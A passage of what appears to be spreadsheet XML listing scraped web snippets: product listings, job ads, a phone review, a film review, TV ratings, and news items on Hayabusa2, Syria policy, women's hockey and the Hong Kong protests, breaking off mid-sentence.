    <t>Use your Aliexpress login details to log in. Item will be shipped via ePacket (faster) within 1 x day of the order. These are quality earbuds featuring an upgraded Bluetooth SoC v5.0 with EDR. Click here for the product summary. Main features: [Premium Hi-Fi Sound] BTwear Powerpods adopts cutting-edge driver unit with 10mm magnetic diaphragm having more than 1 Tesla(T) magnetic density, which significantly improves the conversion rate of electrical energy to sound. Moreover, the 3.5u rigid TEP diaphragm, lighter and 60% thinner compared with conventional one, enables the earbuds to delivers a more natural and clearer sound with good details, deep rapid bass and wide dynamic range. [Stable Connection and Instant Pairing] Upgraded Bluetooth 5.0 technology guarantees a more reliable and steadier connection without call or music dropouts, you can feel no latency within 33ft (no obstacle in between) and never worry about losing connection while walking. Simply take the wireless earphones out of the case and they will be paired automatically without complicated tricks. [Secure Fit and IPX5 Waterproof] With semi in-ear design and extremely light weight (5.9g), the TWS earbuds fit your ear snugly and improve the sports and workout experience. Besides, IPX5 sweat proof also ensures you to enjoy free sports, no longer worry about water or sweat ingress anymore. [Smart Touch Control and Built-in Battery] The wireless earbuds come with sensitive touch bar, you can skip/paly/pause a track, answer/reject phone call or activate voice assistant just by tapping it. Each earbud can provide 8 hours’ playtime and 10 days’ standby time, with the 450mAh charging case, the time can be extended by 5 times. [Friendly Customer Service] Ready to respond within 24 hours. This device is warranted for 12 months from date of the original purchase for manufacturing defects. If it fails due to a manufacturing defect, please contact seller directly to initiate return and warranty process</t>
  </si>
  <si>
    <t>CamM</t>
  </si>
  <si>
    <t>Not quite as good as last time, but still a great price. Also available from Amazon for the same price Present Like Never Before * Play videos and open links while presenting * Track time and set vibration alerts * 30-metre range lets you move around the room freely</t>
  </si>
  <si>
    <t>TO MARK this week’s opening of the Brisbane International Film Festival, here are our top 21 Queensland-made films</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/ntwmn7A5Mq4/299621-japans-hayabusa2-spacecraft-drops-off-its-last-robot-on-asteroid-ryugu Japan’s Hayabusa2 Spacecraft Drops Off Its Last Robot on Asteroid Ryugu Japan’s Hayabusa2 spacecraft has been hanging around the asteroid Ryugu for more than a year, dropping off robots and blasting the surface with metal slugs. The Japanese Space Agency (JAXA) hopes to bring Hayabusa2 and its precious cargo of asteroid samples home soon, but first, there’s just one more robot to deploy. Hayabusa2 carried several robots with it to Ryugu, and JAXA confirms the spacecraft released its final robotic explorer last night. The Minerva-II2 rover began its descent from an altitude of about 1 kilometer (0.6 miles), but it won’t reach the surface until early next week. After releasing the lander, Hayabusa2 moved back up to a higher orbit to monitor the robot’s progress. The first round of robotic explorers consisted of Minerva-II1A and Minerva-II1B, but they weren’t quite rovers. These drum-shaped robots had motors that allowed them to hop along the surface, taking photos and gathering temperature data along the way. This helped JAXA understand the structure of Ryugu, which was much more uneven than they had expected. In late 2018, Hayabusa2 dropped off another robot called MASCOT. This robot used a similar method of moving around the surface, but it was boxy and had no solar panels. It ran just 16 hours on internal battery power before shutting down. Minerva-II2 is the third distinct type of robot aboard Hayabusa2. Again, it’s mobile, but calling it a “rover” is a bit misleading. Minerva-II2 is drum-shaped like the previous Minerva explorers, but it’s larger than they were. The image above shows the descent module containing Minerva-II2, and below you can see what the robot actually looks like. The Minerva-II2 lander is similar to JAXA’s last Minerva robots, but it’s substantially larger. JAXA previously reported possible issues with Minerva-II2’s CPU. That might prevent it from relaying data to the spacecraft, but there’s no harm in the attempt at this point. Hayabusa2 has completed its primary mission, using tantalum slugs to launch material from the surface of Ryugu into its sample collection compartment. Even if Minerva-II2 doesn’t work, Hayabusa2 can set course for Earth in the coming weeks with a wealth of data about Ryugu. The sample container should land on Earth in late 2020, allowing scientists to study material from an asteroid that hasn’t been scorched in the atmosphere for the first time. Now read: Hayabusa 2 Photographs Dark Spot at Asteroid Landing Site Hayabusa 2 Probe Successfully Bombs Asteroid Ryugu Japan’s Hayabusa 2 Spacecraft Reaches Asteroid, Prepares to Collect Sample Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/ntwmn7A5Mq4/299621-japans-hayabusa2-spacecraft-drops-off-its-last-robot-on-asteroid-ryugu The post Japan’s Hayabusa2 Spacecraft Drops Off Its Last Robot on Asteroid Ryugu appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Source: https://www.wired.com/story/kitty-hawk-heaviside-larry-page-flying-car Kitty Hawk’s New Flying Car Promises a (Near) Silent Flight Larry Page’s aviation outfit, helmed by Sebastian Thrun, built the Heaviside with eight motors and a big wing to help generate lift. Source: https://www.wired.com/story/kitty-hawk-heaviside-larry-page-flying-car The post Kitty Hawk’s New Flying Car Promises a (Near) Silent Flight appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>German Norwegian Dictionary – travel dictionary to translate German to Norwegian. Click on the list to show German or Norwegian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading German Norwegian Dictionary →</t>
  </si>
  <si>
    <t>The Greens’ plan to fly a hot air balloon over Parliament House has been deflated after a last-minute air traffic ban prevented it from taking flight. Greens leader Richard Di Natale hit out at the Morrison government accusing it of political interference after the balloon was grounded by the Civil Aviation Safety Authority. Mr Di Natale said while the protest demonstration was stopped, the Prime Minister would not "keep our voices silent". "[Mr Morrison] sits on his hands when it comes to a climate emergency, but throws the book at people who are protesting peacefully because they’re sick of government inaction," he said.</t>
  </si>
  <si>
    <t>Two years after a shooter rained gunfire on country music fans from a high-rise Las Vegas hotel, MGM Resorts International reaches a settlement that could see up to $US800 million paid to victims.</t>
  </si>
  <si>
    <t>If you are a meticulous, punctual, quick and efficient than we have a great job opportunity for you. Require you to have your own vehicle (mileage and gas not payed), must leave in south end of Calgary (Auburn bay, Bridal wood etc). All clients are in and around these areas so driving is minimal. Working .. Read more</t>
  </si>
  <si>
    <t>We’re going on an epic Austrian food tour! We’re in the beautiful city of Vienna with our buds Emma &amp; Alex, a.k.a. the Travel Beans, and we’re on a mission to try all of the most delicious Austrian food we can find 😍🇦🇹🍽 Watch Emma &amp; Alex’s video! (And don’t forget to subscribe to them!) […] The post Austrian Food Is DELICIOUS! – Food Tour in VIENNA AUSTRIA w/ The Travel Beans! appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Hello, I’m looking for cash work for the long weekend. I’m a skilled laborer I have no tools or vehicle but I have done everything from drywall flooring Landscaping painting I have a business diploma and am punctual professional and positive. I get paid 15 to $20 an hour cash depending on the task my .. Read more</t>
  </si>
  <si>
    <t>Photo by Justin K. Aller/Getty Images The Pittsburgh Steelers are back, and we keep you up to date with those who aren’t able to watch the game live. 1st Quarter In-Game Update 2nd Quarter In-Game Update The Steelers started the second half the same way the ended the first half, but with one major difference. With a good mix of the short passing game and power running, James Conner moved the Steelers deep in Cincinnati territory. Facing a first and goal, the Steelers utilized the wildcat formation again with Samuels at quarterback, he kept the football and scored his first touchdown of 2019. The Boswell kick was good, giving the Steelers a 17-3 lead early in the third quarter. After another Bengals three-and-out, Rudolph hit Diontae Jonson for a 43-yard touchdown on second down to add to the Steelers lead. Boswell’s point-after was good, making the score 24-3 with 9:24 left in the third quarter. After several three-and-outs by both teams, the Steelers’ 24-3 lead stood heading into the final frame of regulation.</t>
  </si>
  <si>
    <t>Troops and rescue workers are battling flooding and landslides after the strongest storm to hit Japan in 60 years. The post Typhoon Hagibis: Rescuers deployed in wake of deadly storm appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>EMMERDALE fans are in for some more drama-packed weeks as there is set to be a double death that sends the village into turmoil, as Moira Dingle and Nate Robinson’s affair is set to finally be exposed. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Found at Glenboig. The ‘M’ looks like an upside-down ‘W’. Glenboig Union Fireclay Company, Glenboig, Lanarkshire. Alternative brickworks include: Glenboig Star Fireclay Works, Glenboig, Lanarkshire. Glenboig Fireclay Works, (Old Works) Glenboig, Lanarkshire.</t>
  </si>
  <si>
    <t>THE Member of Parliament for Magwegwe Constituency in Bulawayo, Anele Ndebele (MDC Alliance), has been arrested for allegedly raping and impregnating a high school pupil. Ndebele is accused of raping the Upper Six pupil who learns at a school in Kezi, Matabeleland South Province. National police spokesperson Assistant Commissioner Paul Nyathi confirmed the MP’s arrest yesterday. “I</t>
  </si>
  <si>
    <t>Emergency crews were called to a residential area on Don Mills Road near Steeles Avenue East at around 7:30 p.m. on Thursday after receiving multiple calls from people who heard gunshots.</t>
  </si>
  <si>
    <t>We Are Not Princesses, directed by Bridgette Auger and Itab Azzam, tells the powerful stories from four women, Syrian refugees living in Lebanon, as they prepare for their roles in a production of Antigone. Antigone, the ancient Greek tragedy written by Sophocles, tells the story of a princess who defies her King’s edict by burying her brother, a story which resonates deeply with many of the woman with its themes of tragedy, love, familial bonds, and patriarchal oppression. The movie doesn’t go into too much detail about the theatre project itself (a workshop created by an organization called Open Art Foundation to help Syrian refugees build community and allow women to process their trauma). Instead, the film chooses to follow individual women in their everyday lives and as they open up about their stories about life before and after leaving Syria. The film also follows the women’s lively conversations in their workshop preparations about the meaning of the play to their lives and their affinity with Antigone and other characters. You can sense that Auger and Azzam were able to connect with the women on a genuine level as they draw out intimate stories of emotional honesty. Many of the women talk about being married off at a young age, and the constraining effect that had on their lives. In one shattering sequence, Zayna, who was married when she was 14, describes being confined to her house by her husband after she lost her face veil, then begging her husband to let her out. Zayna’s family did not allow her to be filmed and in order to include her story, the filmmakers chose to illustrate her story and the stories of other women as well. The impressionistic animation style enables the film to visually represent the complicated inner lives of these women, their hopes and shattered dreams. In Zayna’s case, she imagines the world outside the four walls of her home, as the animation shows the mountains and forests that she is unable to experience, and her growing angel’s wings as she imagines flying home to Syria. Grief and homesickness are part of the story that We Are Not Princesses tells. But the film also tells the story of resilience, community, and strength, as well as the ability of art to process and heal. One of the woman sees the act of Antigone defying the king’s edict as evidence that “a woman doesn’t have to accept a man telling her ‘no’ or ordering her around Other women talk about how the theatre workshop gave them life and a sense of meaning. In a startling but fun segment, one women, Israa, stammers out a rap song about her escape from Syria in high heels. Oftentimes the news we get on the scrolling Facebook feeds and social mediate bites threatens to paint all refugees with the same faceless mass of suffering, dependence, and victimhood, and we fail to see people as individuals. We Are Not Princesses deftly tells the story of resilient individuals, who are surviving, yes, but also managing to thrive. We Are Not Princess will be playing on Friday, October 4, 2019 at 11:00 at International Village Patricia Lim lives in Vancouver and has also spent time in Halifax, Manila, and Beijing. She has written for Ricepaper, Schema, Converge, and Vancouver Observer. She enjoys examining the connections between culture, history, and identity.</t>
  </si>
  <si>
    <t>During her first five years playing professional women’s hockey, Kaleigh Fratkin built relationships with dozens of teammates whom she knew shared a common ideology about their sport. This summer, when Fratkin saw many of those former linemates around Boston, where she lives, the meetings had turned unsettling. “I personally have had these weird, awkward kind of encounters with friends and former teammates where it’s just kind of avoiding that elephant in the room,” Fratkin said. That elephant is the splintering of women’s hockey after the closure of the Canadian Women’s Hockey League in May. The departure of the C.W.H.L. left one pro league in North America: the National Women’s Hockey League. But the N.W.H.L.’s slow growth, and its highest announced salary of $15,000, left many players in search of an alternative path. Enter the Professional Women’s Hockey Players’ Association, which aims to create a professional league that provides livable salaries so its athletes would not need second jobs. The members of the association, including Olympians from the United States and Canada, quickly declared that they would sit out the 2019-20 season. Such a statement from the sport’s biggest names was akin to a commandment. The N.W.H.L. has weathered questions about its viability, though, and opened its fifth season on Oct. 5 with five teams and about 100 players. This year, the N.W.H.L. will play an increased schedule of 24 games, welcome new sponsors and owners, and have games live-streamed on the gaming platform Twitch. The N.W.H.L. still lacks many of the standards a majority of players desire, such as live television coverage, backing from the N.H.L. similar to what the N.B.A. has provided the W.N.B.A. and more convenient practice schedules. But its devoted contingent is determined to continue on its chosen course toward sustainability. “I truly believed in the work that was being put in to drive the sport,” said Fratkin, who was the first player to re-sign for the 2019-20 season. “I’ve seen some highs, and there’s a ton of potential there.” Fratkin added that the N.W.H.L. was becoming more transparent about its operations and was working toward increasing pay and finding more sponsors. Beginning this season, players receive 50 percent of league-level sponsorship and media deals; such partners include Dunkin’ Donuts, Chipwich and Twitch. Fratkin’s team, the Boston Pride, was purchased by an investor group led by the venture capitalist Miles Arnone, who has pledged more resources to the fledgling franchise. The Pride are the only N.W.H.L. club under private ownership; the other teams are operated by the league. The Pegula family, which owns the Buffalo Bills and Sabres, gave up ownership of the N.W.H.L’s Buffalo Beauts after the top players announced their boycott; the Devils also ended their partnership with the Metropolitan Riveters about a week later. Instead of using the Sabres’ practice facility in Buffalo and the Devils’ practice facility in Newark, those teams are now based in suburban or exurban rinks. Fratkin initially worried about staying with the N.W.H.L. “Am I hurting the sport if I choose the N.W.H.L.? That was a lot of the connotation going around,” said Fratkin, who hoped that by being the first to stay she would encourage players who were afraid last spring to publicly say that they wanted to return to the league. That same motivation drove Allie Thunstrom to become the first player to re-sign with the Minnesota Whitecaps. In late April, the Whitecaps held a team meeting where players supporting the N.W.H.L. and P.W.H.P.A. made their cases. It became clear that the Whitecaps would not be returning in full form. Thunstrom, though, said that the Whitecaps’ fan support and success as league champions last season convinced her that the team was on the right path in the N.W.H.L. “Others reached out and said, ‘Thank you,’ ” she said. The P.W.H.P.A. includes former league all-stars like Hilary Knight, Kendall Coyne Schofield and Shannon Szabados, who, Thunstrom said, are “such great names and such great hockey players, you naturally want to follow their lead.” Without Olympians and other top stars, the N.W.H.L. has become more accessible for those who thought playing pro hockey was not an option. Nichelle Simon, who played college and recreational hockey, dedicated two years of training to compete on “American Ninja Warrior” in 2017. Afterward, her sights turned toward the N.W.H.L. But in February 2018, Simon found out she had breast cancer. After completing her treatment, she tried out for the Riveters in June and was signed. “I feel like I haven’t played the best years of my hockey,” Simon, 36, said. “I had about a little less than a year from the end of my chemo to the start of tryouts. It helped get me through it so much.” Another newcomer was Emma Ruggiero, who knew she wasn’t national team caliber but still yearned to play hockey after college. A recent graduate of Division III Buffalo State, Ruggiero works as a server at IHOP. When Mandy Cronin, general manager of the Buffalo Beauts, invited her to try out, Ruggiero said the decision was a no-brainer. “I may never get this opportunity again,” she said. There does not seem to be any ill will toward the boycotters from the majority of N.W.H.L. players. But veterans like Jillian Dempsey, who is one of eight players who has remained with the N.W.H.L. since its inception in 2015, felt the league’s reputation was unfairly discredited in the off-season. “The past five months it’s felt like, I don’t want to say a dig, but bringing the N.W.H.L. down by saying this is not a sustainable league that we believe in, that sense coming from the P.W.H.P.A. group,” said Dempsey, 28, who teaches fifth grade full-time in Winthrop, Mass., her hometown. “I know they say it has nothing to do with the N.W.H.L., but it does end up affecting the N.W.H.L.” The National Hockey League could end the division in women’s hockey, but it has decided not to step in. The N.H.L. doubled its contribution to the N.W.H.L. for this season — to $100,000 from $50,000 — but otherwise has little involvement in the women’s game. Since the formation of the P.W.H.P.A., there has been almost no communication between the association and the N.W.H.L. on a business front. But not everyone views the schism as a negative. The P.W.H.P.A.’s Dream Gap Tour, where the top players are participating in clinics and exhibitions this fall, has stops in Toronto; Hudson, N.H.; and Chicago, cities that do not have N.W.H.L. teams. “At the end of the day, having these two separate paths might be a very good thing,” Thunstrom said. “They’re hitting a lot of markets we don’t in the N.W.H.L. — that might be a really good thing. Eventually, hopefully all sides can come together and make this what everyone wants it to be.” Source link</t>
  </si>
  <si>
    <t>President Trump on Tuesday said that President Recep Tayyip Erdogan of Turkey would be visiting the White House in mid-November, an invitation added to the calendar amid Mr. Trump’s abrupt and widely criticized decision to clear the way for a Turkish military operation against American-assisted forces in Syria. Mr. Trump declared on Monday that it was “time for us to get out” of Syria and faced immediate backlash from Senate Republicans. His decision goes against recommendations from top officials at the State and Defense departments. American troops withdrew on Monday from posts near two Syrian towns by the Turkish border. Defending his decision on Tuesday, Mr. Trump wrote on Twitter that Turkey, a fellow member of the North Atlantic Treaty Organization, has “been good to deal with, helping me to save many lives” in Idlib Province in Northern Syria, on the Turkish border. He praised Mr. Erdogan for returning an American pastor, Andrew Brunson, in 2018 after holding him for two years over accusations that he was a spy who helped terrorists. “He is coming to the U.S. as my guest on November 13th. #ENDENDLESSWARS,” Mr. Trump wrote of Mr. Erdogan. Turkish officials said Mr. Trump made the invitation to Mr. Erdogan on Monday when the two men spoke by phone. After the White House announced its major shift in foreign policy Monday, Mr. Trump fired off some tough-talking Twitter posts to assure critics that he was not conceding to Turkey in any way. “As I have stated strongly before, and just to reiterate, if Turkey does anything that I, in my great and unmatched wisdom, consider to be off limits, I will totally destroy and obliterate the Economy of Turkey (I’ve done before!),” he wrote. Republican lawmakers, including two of Mr. Trump’s close allies in the Senate, Senators Lindsey Graham of South Carolina and Mitch McConnell, the majority leader, both spoke against Mr. Trump’s withdrawal plan. They and other Republicans argue that withdrawing from northeastern Syria the approximately 1,000 American troops stationed there would open a vacuum that could be exploited by terrorists or President Bashar al-Assad of Syria or his Russian and Iranian allies. Source link</t>
  </si>
  <si>
    <t>Back at IFA 2019 in Berlin, Motorola announced some new smartphones including the One Zoom with quad cameras. There was also the Moto E6 Plus for those looking for a budget handset. What should have been a surprise was actually a simple confirmation of the device due to leaks leading up to the event. The information about the E6 Plus matched up to the final phone. Nevertheless, we’re happy to see Motorola bring along another addition to the popular E-series of cheap smarphones. They satisfy those not wanting to spend much on a handset or simply don’t require the more advanced features of a flagship. For less than £100, you get a smartphone with a nice deign and perfectly good specs. Price &amp; Availability As we’ve just mentioned, the Moto E6 Plus is firmly in the budget category of smartphones going by the price. At just £99 you can spend twice the amount on alternatives in the same market. This is £50 cheaper than the Moto E5 Plus which is quite a price drop. You can buy it from Motorola or Amazon. Check out what other affordable options are available in our best budget phone chart. Design &amp; Build Budget smartphones have adapted very quickly to the trend of almost infinite screens.Although the chin and bezels of the E6 Plus are still thicker than you’ll find on more expensive models, the truth is that the Moto family has taken a fairly large step in design by finally removing the thick top notch to accommodate the selfie camera Instead we find a U-shaped notch in the centre to house the front camera without having to steal excessive space from the screen. The power and volume buttons are on the right side, while at the bottom we find the micro-USB port, a mono speaker and 3.5 mm headphone jack – something we love finding on cheaper phones with it all but exstinct on flagships. The back is understandably plastic, but the crystallized effect gives a premium feel to the phone that does not look as cheap as the price suggests. It still attracts marks and fingerprints, but then the same is true of expensive phones likes the Huawei P30 Pro. The circular module in which the rear cameras were housed on the E5 Plus has disappeared to give way to a configuration aligned vertically on the left side. Under the cameras is the LED flash and in the centre we see again the Motorola logo that serves as a fingerprint reader. It should be noted how light the Moto E6 Plus feels when holding it in the hand, even when the battery is in. Here is it removable, which is highly unusual for a modern smartphone. &lt; The truth is that Motorola has managed to reduce the weight quite a bit in this device, since the E5 Plus weighed 197g, while the E6 Plus weighs just 149g. You can buy the E6 Plus in four different colors: Polished Graphite, Bright Cherry, Right Cranberry or Caribbean Blue. Which ones are available depends which market you are in. Overall, then, the Moto E6 Plus design doesn’t feel cheap at all. We like the premium look and feel which is on par with rivals like the Samsung Galaxy A10 or the Xiaomi Redmi 7. Specs &amp; Features Now we’ve covered the design and aesthetics of this budget Motorola phone, let’s focus on talking about the technical specifications – starting with the screen. Screen We are looking at an HD+ panel here (720 x 1560 pixels) with a diagonal size of 6.1in capable of getting closer to that infinite screen effect thanks to the U-shaped notch mentioned above. The aspect ratio this time is a tall 19.5:9 with a screen-to-body ratio of just over 80%. The screen is a highlight of the phone thanks to its large size and also a decent brightness. Our test rates it at 334cd/m2 and when we used the Moto E6 Plus outdoors in sunlight the brightness makes it viewable. It’s also impressive to find the panel is IPS LCD rather than a more basic option. This means you get good viewing angles when using the phone. We also find the colour to be vibrant and accurate. Core components and performance If we take a look inside the Moto E6 Plus, we will find a low-end MediaTek Helio P22 processor, with eight cores and a maximum speed of 2GHz. There are two models when it comes to RAM and strorage but only the 2/32GB option appears to be available in the UK, not 4/64GB. That’s not much memory or storage for a phone in 2019, but we’re looking at a device that costs under £100. Fortunately, there’s a microSD card slot to save the day, meaningn you can add up to 512GB more. In our testing the performance of the E6 Plus has been good. Just note that this is a handset for basic functions, so don’t expect to be able to push it with anything too demanding. When it comes to benchmark results, the phone fairs pretty well – especially when you see how big the jump is from the Moto E5 Plus. Almost double the score in Geekbench 4. However, there are other budget phones with more performance available if you need it such as the Xiaomi Redmi Note 7. We’ve also compared it to the UMIDIGI One Pro and Huawei P Smart. The One Pro is more expensive but does come with things like wireless charging and NFC. Battery life In our battery tests the Moto E6 Plus lasted 8 hours and 45 minutes with the screen on, a time that is quite good if we compare it with the premium OnePlus 7T (9 hours and 17 minutes) or the LG V50 (8 hours and 46 minutes). As we have said, the battery tests are performed with the screen on, however, in our daily use with the phone we only had to charge the battery at bedtime (with average usage). The 5W micro-USB charger took an hour to charge 28% of the battery, two hours to charge 60% and three and a half hours to charge 100%. This is a big drawback when compared to other phones which offer fast charging, including the Moto G7. As mentioned earlier, it’s very unusual that the 3,000mAh battery is removable – although it used to be very normal for a smartphone. This means you can carry around a spare and swap it over if the battery dies. Cameras As previously mentioned, the E6 Plushas a dual camera at the rear. The upper lens is the main 13Mp sensor with an aperture of f/2.0, while the second lens is actually a 2Mp depth sensor. The camera software enhances the hardware by allowing different mode: panoramic, bokeh (or portrait effect with blurred background) and facial beauty. Forget the wide angle, macro, telephoto or night mode that we see in higher-end phones – those are not an option at this price. In the gallery you can see the result of our camera tests with the E6 Plus and you can see that the results, although not bad, are not outstanding either. However, we need to keep in mind just how affordable this phone is. The panoramic option allows you to capture landscapes or environments which don’t fit into the normal frame. In our tests we have obtained satisfactory results. The zoom is an aspect that disappoints, as you can see in the gallery photos lose sharpness and detail. On the other hand, something that has impressed us a lot is the option to choose the degree of background blur to get those pictures with portrait or bokeh effect. This is typically not something you’d expect on a budget phone and the effect, although not perfect, has proved more accurate than we expected. The beauty filter is available on both cameras. You can choose to smooth the skin to get that ‘perfect’ skin effect , although like so many it may be too perfect and unnatural if you choose the maximum. You can also choose the brightness and tone of the skin. The camera app’s interface is quite simple. You will not find options like a pro mode, and the truth is that for a little more money you can get mid-range phones with better results, such as the Realme 3 Pro if you can afford it. The front camera is 8Mp with f/2.0 aperture. You find options to use portrait effect with the blurred background, in addition to beauty filter. You can take a look at the results in our gallery. If you are interested in video, the quality is 720×1080, both in the front and rear cameras and its software supports snap video recording. Verdict The Moto E6 Plus is another good purchase for users who have a tighter budget and are not very demanding in terms of specifications. Taking into account the price of the smartphone, we can say that its performance and specifications are optimal, although you may also be interested in taking a look at some more expensive options such as Xiaomi or Huawei. You get a lot for your money here including a large screen, good battery life and nice design. However, photography isn’t great and the core specs will be too limited for some. Luckily there is a microSD card slot for adding more storage. This review originally appeared on PCWorld Spain. Source link</t>
  </si>
  <si>
    <t>LUXEMBOURG, Luxembourg – For exceptional commitment to the BGL BNP Paribas Luxembourg Open, Germany’s Andrea Petkovic was presented with the Jana Novotna Award by the tournament. Presented annually since 2017, the award is given to a player who shows special affinity for the International event, which has been held annually since 1996. Last year, the award was renamed in honor of the late Czech champion Jana Novotna, and presented to home favorite Mandy Minella, while former champion Monica Niculescu won the first award in the year prior. “I feel very honored, I feel very blessed. Jana was somebody that I always looked up to, and it was with great sadness when I heard of her passing,” Petkovic said. “This is just a great honor for me, and I’m just very humbled. It feels strange, because there are many more players that deserve this than me. “What I really like, and what’s important to me about tennis is that all my friends and colleagues that I’ve played against, it’s from them that I take the life lessons that I try to show on court. “The girls that have been faster than me, more talented than me, smarter than me, I just take life lessons from them and I get inspired by them. That’s how I evolve every day, and I want to give that back to them.” In photos: Lighting up Luxembourg: A decade of champions Petkovic was presented with the award at Sunday’s players’ party, ahead of her 11th career appearance at the event. A semifinalist in 2012, Petkovic has reached two other quarterfinals in Luxembourg. “I’m always very happy, and I love coming to Luxembourg…tennis in general has always been more than a sport for me,” Petkovic added. “It’s about the people behind the scenes, the people who make these tournaments happen, the kids that watch us, and the proximity to the fans – that’s all a given here in Luxembourg, and that’s why I love coming here. “It’s also very close to my home, so I have a lot of friends with me, and my family comes to watch me play. Everything is so great here and I’m so glad to be back.” Fresh off of reaching the semifinals at the Upper Austria Ladies’ Linz, where she lost to eventual champion Coco Gauff, the former World No.9 will face No.6 seed Camila Giorgi in the first round on Tuesday. The post Petkovic presented with Jana Novotna Award in Luxembourg appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>Jacob Bowen, 25, appeared in the WA District Court on Tuesday for the 13-person jury to deliver their verdict on nine sexual assault charges made against him by the young pair of siblings.</t>
  </si>
  <si>
    <t>Democrat Elaine Luria has backed the inquiry – but do all of her Virginia constituents back her? The post Trump impeachment: Democrat Elaine Luria defends backing inquiry appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Royal Yachts is an industry leader in the yacht chartering and brokerage business. The company was established in Dubai in 2011 and offers unparalleled service in yacht chartering. We offer a range of prestigious boats ranging in size and capacity from 50 feet to 50 metres. We tailor our services to exceed our clients’ expectations […] The post Royal Yachts – Luxury Yacht CHARTER IN DUBAI appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>BRITAIN’s unluckiest town for drivers has been revealed in a new study which reveals areas new vehicle owners are suffering accidents. New research combined car ownership statistics with the number of non-fault accidents to reveal hotspots across the UK where crashes could happen, potentially boosting car insurance prices for motorists. Daily Express :: Cars Feed</t>
  </si>
  <si>
    <t>Litecoin price is nursing losses in the session some 3.15% towards the latter stages of the session. LTC/USD is moving within a bearish flag structure via the daily chart view. Price action has largely narrowed and is subject to an imminent breakout. LTC/USD daily chart Over the last nine sessions, the price has been stuck within a range of $4. LTC/USD 60-minute chart The price via the 60-minute view is being supported by an ascending trend line. Spot rate: 55.79 Relative change: -3.15% High: 56.66 Low: 53.77</t>
  </si>
  <si>
    <t>Lucas Mearian</t>
  </si>
  <si>
    <t>A new survey of hundreds of U.S. companies shows that 51% of workers experienced at least one mobile device issue a month that hindered their ability to do their job – and the number of such problems is increasing. The second annual State of Enterprise Mobility Survey found that mobile device failures can have financial impacts on companies, including lost productivity and workers calling in sick because of job stress – particularly for companies that use thousands of mobile devices in the field. [ Related: Android Upgrade Report Card: Grading manufacturers on Pie ] More than one-third (37%) of those surveyed experienced an increase in mobile device issues during the past 12 to 18 months; the most common failures involved unreliable network connections (45%); battery failure (41%); and apps that crash or become unstable (40%). To read this article in full, please click here</t>
  </si>
  <si>
    <t>Millennials are eschewing large pay packets in preference to having wellness facilities, flexible hours and training included in their remuneration contracts,</t>
  </si>
  <si>
    <t>Julia Zemiro’s Home Delivery is back with new episodes from tomorrow. First guest is Costa Georgiadis. Wait for the closing scene, that’s all I’ll say… Costa’s infectious enthusiasm jumps off the screen as the Bondi born-and-bred landscaper drives Julia to the family home, primary school and sporting fields of his youth. Their chariot? A classic brown Holden Gemini station wagon. Julia discovers a man not just passionate about plants and the environment, but with a deep spiritual connection to family and community. At times emotional, at others joyous it’s an episode that will both surprise and delight. And to top it all off Costa reveals a hitherto unknown skill, one that has the potential to take him all the way to Eurovision 2020. 8pm Wednesday on ABC.</t>
  </si>
  <si>
    <t>It was mostly another quiet Thursday but there were a few points of interest in the daily numbers. The season final of Gogglebox was the top entertainment show of the night at 794,000 followed by The Bachelorette at 694,000. These both topped the demos and helped push 10 into second place ahead of Nine. An extended Home and Away was the nearest competitor at 513,000 which together with Seven News at 879,000 / 845,000 ensured Seven won the night. Seven network won Thursday with 29.0% then 10 23.3%, Nine 23.0%, ABC 17.4% and SBS 7.2%. The Chase drew 503,000 / 321,000 for Seven and movie: Wonder Woman was 317,000. The Project pulled 445,000 / 252,000 for 10 then 10 News First (324,000) and a Playing for Keeps replay (176,000) Celebrity Name Game was low at 166,000. Nine News was 761,000 / 753,000 for Nine then A Current Affair (639,000), RBT (473,000) and Hot Seat (413,000 / 279,000). Love Island drew and movie: Fifty Shades Darker was just 136,000. ABC News (627,000), an extended 7:30 (460,000), Escape from the City (403,000), Vera (299,000), Sammy J (266,000) and The Drum (167,000) made up ABC’s night. On SBS it was Ainsley’s Australian Market Menu (170,000), SBS World News (123,000), Monty Don’s Paradise Gardens (120,000). The Name Of The Rose was 46,000. 7TWO’s Father Brown topped multichannels at 168,000. The Morning Show: 129,000 / 62,000 Today Extra: 94,000 / 73,000 Studio 10: 59,000 / 54,000 / OzTAM Overnights: Thursday 17 October 2019</t>
  </si>
  <si>
    <t>Tottenham have been dealt a fresh double fitness blow with Hueng-min Son and Christian Eriksen doubtful for Saturday's clash with Watford</t>
  </si>
  <si>
    <t>New Bulldog Josh Bruce hopes he won’t have to endure the stress and uncertainty of trade period ever again.</t>
  </si>
  <si>
    <t>The papers look ahead to a key week for UK-EU relations and respond to Eliud Kipchoge's achievement. The post The Papers: Brexit bargain and ‘marathon miracle’ appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>HONG KONG — Raw anger was building in Hong Kong on Wednesday over the shooting of a teenage demonstrator a day earlier, the first such incident since antigovernment demonstrations began in the territory nearly four months ago. The shooting of the teenager came on a day of intense clashes across Hong Kong between protesters and the police, and hours after China’s top leader, Xi Jinping, presided over a carefully choreographed military parade in Beijing to celebrate 70 years of Communist rule. The question now is whether the shooting will further incite a protest movement that was already seething with grievances, and which has been driven by young people who see the city’s pro-Beijing leaders as illegitimate. In an early sign of anger over the shooting, a Wednesday morning meeting between administrators at the teenager’s high school and more than 100 of its alumni quickly devolved into a bitter confrontation. Many of the former students cried, shouted questions and asked why the administrators had not condemned the police officer who shot the student. “Can you see how many people are crying here?” one woman pleaded. But others suggested the school take action against the student for his conduct in the protests, including Leung Chun-ying, Hong Kong’s former chief executive. The Hong Kong Police Force said on Tuesday evening that the protester was an 18-year-old who had been shot in the left shoulder, and that he was conscious as he was taken to the hospital for surgery. In a video circulating online that appears to show the shooting, the protester is first seen joining a mob of black-clad people who chase a riot officer and tackle him to the ground. They kick him and beat him with what appear to be pipes. A few seconds later, the protester approaches a second police officer who is nearby with a handgun drawn. Just after the protester hits the 